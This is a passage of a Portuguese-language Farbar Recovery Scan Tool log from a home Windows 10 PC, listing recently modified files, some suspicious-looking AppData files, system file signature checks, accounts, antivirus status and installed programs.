2017-07-04 21:45 - 2017-07-04 21:48 - 081688828 _____ C:\Users\Hercílio\Downloads\PUNCH_Re_Creators_-_01v2_MQ.mp4
 
==================== Um Mês Modificados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-08-03 15:34 - 2017-05-06 19:00 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-03 13:09 - 2017-05-06 19:28 - 002038074 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-03 13:09 - 2017-03-20 01:00 - 000842536 _____ C:\WINDOWS\system32\prfh0416.dat
2017-08-03 13:09 - 2017-03-20 01:00 - 000202972 _____ C:\WINDOWS\system32\prfc0416.dat
2017-08-03 13:01 - 2017-05-06 19:37 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-03 11:25 - 2017-03-18 18:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-03 11:10 - 2016-12-19 14:53 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-03 11:05 - 2017-03-18 08:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-02 09:56 - 2017-03-18 18:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-02 09:56 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-01 08:51 - 2017-02-17 00:13 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\qBittorrent
2017-07-31 21:40 - 2015-11-12 13:14 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Skyrim
2017-07-31 17:07 - 2017-05-02 14:51 - 000000000 ____D C:\Users\Hercílio\Desktop\Laryssa
2017-07-31 14:47 - 2017-05-06 19:05 - 000000000 ____D C:\Users\Todos os Usuários\Package Cache
2017-07-31 14:47 - 2017-05-06 19:05 - 000000000 ____D C:\ProgramData\Package Cache
2017-07-31 14:29 - 2017-03-06 08:11 - 000000000 ____D C:\Games
2017-07-31 14:10 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-07-31 13:11 - 2016-04-10 09:17 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Crashlands
2017-07-30 18:31 - 2015-05-23 13:14 - 000000000 ____D C:\KMPlayer
2017-07-23 13:57 - 2016-03-11 15:20 - 000000000 ____D C:\Program Files (x86)\Steam
2017-07-20 10:41 - 2017-05-06 19:07 - 000000000 ____D C:\Users\Hercílio
2017-07-20 10:38 - 2017-03-18 08:40 - 002359296 _____ C:\WINDOWS\system32\config\BBI
2017-07-17 07:49 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\Registration
2017-07-16 19:00 - 2017-04-07 17:10 - 000000000 ____D C:\stremio-cache
2017-07-16 08:20 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\rescache
2017-07-14 19:56 - 2017-05-26 12:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gwent [GOG.com]
2017-07-14 19:56 - 2015-08-20 13:49 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mass Effect 2
2017-07-14 19:56 - 2015-05-21 15:49 - 000000000 ____D C:\Users\Hercílio\Desktop\Jogos
2017-07-14 19:54 - 2017-05-06 15:21 - 000000000 ___DC C:\WINDOWS\Panther
2017-07-14 19:54 - 2015-05-21 14:16 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\DAEMON Tools Pro
2017-07-14 19:31 - 2017-04-30 21:47 - 000984032 _____ (Realtek ) C:\WINDOWS\system32\Drivers\rt640x64.sys
2017-07-14 19:17 - 2017-05-06 19:04 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-07-14 19:17 - 2017-04-30 22:29 - 000000000 ____D C:\WINDOWS\system32\RTCOM
2017-07-14 19:15 - 2017-05-06 19:37 - 000003218 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_PushButton
2017-07-14 19:15 - 2017-05-06 19:04 - 001019725 _____ C:\WINDOWS\system32\Drivers\rtwavesskdy.dat
2017-07-14 19:15 - 2017-05-06 19:04 - 000031095 _____ C:\WINDOWS\system32\Drivers\rtwavesEFX.dat
2017-07-14 19:15 - 2017-05-06 19:04 - 000010945 _____ C:\WINDOWS\system32\Drivers\rtwavesMFX.dat
2017-07-14 19:12 - 2017-04-30 22:28 - 005545512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2017-07-14 19:12 - 2017-04-30 22:28 - 003503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2017-07-14 19:12 - 2017-04-30 22:28 - 003203424 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2017-07-14 19:12 - 2017-04-30 22:28 - 000192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2017-07-14 19:12 - 2017-04-30 22:28 - 000023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2017-07-14 18:58 - 2016-10-15 00:16 - 000183480 _____ (Intel Corporation) C:\WINDOWS\system32\ibtsiva.exe
2017-07-14 18:58 - 2015-05-21 11:36 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Packages
2017-07-14 18:50 - 2015-05-06 16:43 - 000022864 _____ (OSR Open Systems Resources, Inc.) C:\WINDOWS\system32\Drivers\DellRbtn.sys
2017-07-14 13:10 - 2015-06-03 19:35 - 000000000 ____D C:\Users\Hercílio\Documents\My Games
2017-07-14 09:50 - 2017-03-18 16:27 - 000000000 ____D C:\Program Files (x86)\Deathtrap
2017-07-14 09:46 - 2017-05-24 16:22 - 000000000 ____D C:\Program Files (x86)\The Witcher Enhanced Edition Director's Cut
2017-07-14 09:43 - 2015-05-06 12:43 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-07-13 19:17 - 2017-05-26 12:58 - 000000000 ____D C:\Program Files (x86)\GOG Galaxy
2017-07-13 18:41 - 2015-07-28 10:41 - 000000000 ____D C:\Users\Hercílio\AppData\Local\ElevatedDiagnostics
2017-07-13 17:56 - 2017-05-06 19:37 - 000004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-07-13 17:56 - 2015-11-03 11:54 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-07-13 17:11 - 2015-05-22 16:26 - 000000000 ____D C:\Program Files (x86)\Ubisoft
2017-07-13 17:01 - 2016-08-29 20:46 - 000047672 _____ (Disc Soft Ltd) C:\WINDOWS\system32\Drivers\dtultrausbbus.sys
2017-07-12 20:37 - 2015-05-21 11:27 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 20:20 - 2017-05-06 19:00 - 000408192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 20:17 - 2017-03-18 18:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-12 09:39 - 2017-03-18 17:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-12 09:35 - 2015-05-23 04:09 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-12 09:31 - 2015-05-23 04:09 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-06 20:13 - 2017-06-24 13:11 - 000000000 ____D C:\Users\Todos os Usuários\SupportAssist
2017-07-06 20:13 - 2017-06-24 13:11 - 000000000 ____D C:\ProgramData\SupportAssist
 
==================== Arquivos na raiz de alguns diretórios =======
 
2017-08-03 08:19 - 2017-08-03 08:19 - 000245264 _____ () C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73
2017-08-03 08:19 - 2017-08-03 08:19 - 000047120 _____ () C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6
2015-06-09 11:40 - 2015-07-25 11:11 - 000000024 _____ () C:\Users\Hercílio\AppData\Roaming\appdataFr25.bin
2016-01-05 15:33 - 2016-01-09 21:50 - 000000476 _____ () C:\Users\Hercílio\AppData\Roaming\del.bat
2017-08-03 08:19 - 2017-08-03 08:19 - 000253456 _____ () C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262
2017-08-03 08:19 - 2017-08-03 08:19 - 000936976 _____ () C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED
2017-08-03 08:19 - 2017-08-03 08:19 - 000232464 _____ () C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255
2017-08-03 11:15 - 2017-08-03 11:15 - 001835008 _____ () C:\Users\Hercílio\AppData\Roaming\pxese.exe
2017-03-24 09:20 - 2017-03-24 09:35 - 000007611 _____ () C:\Users\Hercílio\AppData\Local\resmon.resmoncfg
2016-01-03 12:55 - 2016-01-03 12:55 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{31609F87-792D-452B-A799-CB0D7B589CF5}
2015-10-11 21:46 - 2015-10-11 21:46 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{5E3C3A73-CDE7-406C-A35C-482B7D6618E2}
2015-11-17 20:46 - 2015-11-17 20:46 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{6F2A5D38-59DF-44FC-A339-6546150E9A01}
2016-03-30 15:02 - 2016-03-30 15:02 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{85380981-3389-4860-8A4F-201B694530DF}
2015-10-23 20:46 - 2015-10-23 20:46 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{DFA58381-49E3-4E5B-A149-EB3B89B425DA}
2016-05-02 15:02 - 2016-05-02 15:02 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{E8EF03DA-F8BA-439A-A4BB-546EEE37B099}
2016-04-05 15:02 - 2016-04-05 15:02 - 000000000 _____ () C:\Users\Hercílio\AppData\Local\{FEECC933-41BE-42BE-A6B8-8C8722F071D8}
2017-05-06 19:04 - 2017-05-06 19:04 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
 
==================== Bamital & volsnap ======================
 
(Não há correção automática para arquivos que não passaram na verificação.)
 
C:\WINDOWS\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\wininit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\explorer.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\svchost.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\services.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\User32.dll => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\userinit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente
 
LastRegBack: 2017-07-27 23:58
 
==================== Fim de FRST.txt ============================
 
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 31-07-2017
Executado por Hercílio (03-08-2017 15:35:02)
Executando a partir de C:\Users\Hercílio\Desktop
Windows 10 Home Single Language Versão 1703 (X64) (2017-05-06 22:51:30)
Modo da Inicialização: Normal
==========================================================
 
 
==================== Contas: =============================
 
Administrador (S-1-5-21-459013025-3067968454-1995941679-500 - Administrator - Disabled)
Convidado (S-1-5-21-459013025-3067968454-1995941679-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-459013025-3067968454-1995941679-503 - Limited - Disabled)
Hercílio (S-1-5-21-459013025-3067968454-1995941679-1001 - Administrator - Enabled) => C:\Users\Hercílio
 
==================== Central de Segurança ========================
 
(Se uma entrada for incluída na fixlist, será removida.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Programas Instalados ======================
 
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
 
«Dark Souls II - Scholar of the First Sin» 1.02 (HKLM-x32\...\«Dark Souls II - Scholar of the First Sin»_is1) (Version: 1.02 - Namco Bandai)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.3.183.90 - Adobe Systems Incorporated)
Advanced SystemCare 10 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 10.4.0 - IObit)
AMD Catalyst Install Manager (HKLM\...\{2A570AD7-943C-944A-262B-4794578E8E33}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
Assistente de Atualização do Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17387 - Microsoft Corporation)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.21.7 - Bethesda Softworks)
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{51F85784-6799-5CA3-97B2-2E5904FC3E58}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{55A4D3AB-C8DF-26B2-89A8-7E16E1E40700}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{365AEAB2-4CF3-7CBB-0DAC-E9E14B688E65}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{8E6F5592-ED7E-9C50-74AC-BF417B1FE291}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{7ABC6D83-816E-6D48-E65D-B0CEDD294E4E}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{AD28960A-6190-C991-C964-308B86EAA2E2}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{84C3F2C5-F7B2-2F08-CDF4-79EF7CC55D74}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{C3EE628C-7394-FE2C-0C90-C05284EB528D}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0E8A3B17-D603-B1B6-C205-1685EBDD23E9}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{2F544F46-5F6E-97BB-3550-A0242A3C5754}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{1E7D3072-1D28-E33A-99DF-85D9F7ECD06E}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{FC4086D6-E345-5F43-08BB-280FB57DAF49}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{BA26B70C-3D8C-2D14-4122-211FB3E6F691}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{F8EBE530-A4D5-BF51-F623-3787E6B8A878}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{42FBD43F-DE53-6D4D-5134-E3C93B45CBEF}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{5FEACE78-C338-9AED-FF05-7DE7E273C774}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{A3795528-F572-6314-C4E3-EE9DAF0FBF02}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{AC85CF50-9A55-0103-ADBF-365C37603AA4}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{4853A56D-7931-A08B-5BA7-8E2D61043DF9}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{B349892D-B015-033C-4CA8-3635E6B655D7}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{B28CF677-E2C8-12CA-52BB-19B6F066D36A}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{BE8D6AB1-3049-2F0C-67FA-00C0A5D321A3}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{26567561-DFB2-2B63-9BA8-6A490ED37016}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{43F6D22B-E0E9-EE90-9B62-1C5FC5D15A55}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{0809FEC1-EF86-51E9-8210-DC1B1BDB6745}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{D4490E0F-8E7B-1097-B56A-7643C75F1C28}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5FD706FF-6AD8-E372-A35A-879409982655}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{DAB44116-0266-C65B-B643-AC11217C3041}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{3AF70346-52C7-0334-606F-118D1C1CB7A2}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{A4E7CA0C-84EB-5E29-2F04-06C4E4790C2F}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{53AE8AC7-5213-67AF-0DC0-CED696B77643}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{59D2664C-949B-7FA7-9880-ECB993B6616A}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{970A40CA-46AB-986C-1798-976ED0EA00FA}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{DC9DFCBF-87DA-892C-6151-99CC9EF46E3E}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4707CBFC-8ED4-463E-0FF9-DE86F4A743E9}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{C1EFF2A2-DF4A-F6D1-B99C-1ED194AE9E78}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{46EB68BE-8AAC-8C2B-7284-8DEDE6B5CD2A}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{C14A3A5B-8A86-C239-37D7-158211778C54}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{7A6E431B-CF43-EC3E-FD7E-0A0AAB1B25FC}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{A50C89BC-8D8E-8828-824A-7171F6D583D5}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
